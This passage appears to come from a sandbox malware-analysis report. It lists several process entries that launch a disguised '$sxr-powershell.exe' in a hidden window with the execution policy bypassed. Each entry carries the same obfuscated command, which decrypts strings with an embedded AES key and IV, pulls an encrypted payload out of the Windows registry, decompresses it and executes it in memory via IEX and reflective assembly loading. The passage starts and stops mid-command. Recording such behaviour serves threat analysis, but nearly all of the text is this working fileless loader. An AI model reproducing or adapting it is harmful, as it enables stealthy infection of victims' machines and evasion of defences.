$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        24⤵
        
        PID:3800
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9124).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        24⤵
        
        PID:6652
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9124).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        24⤵
        Hide Artifacts: Hidden Window
        
        PID:8212
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9124).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = 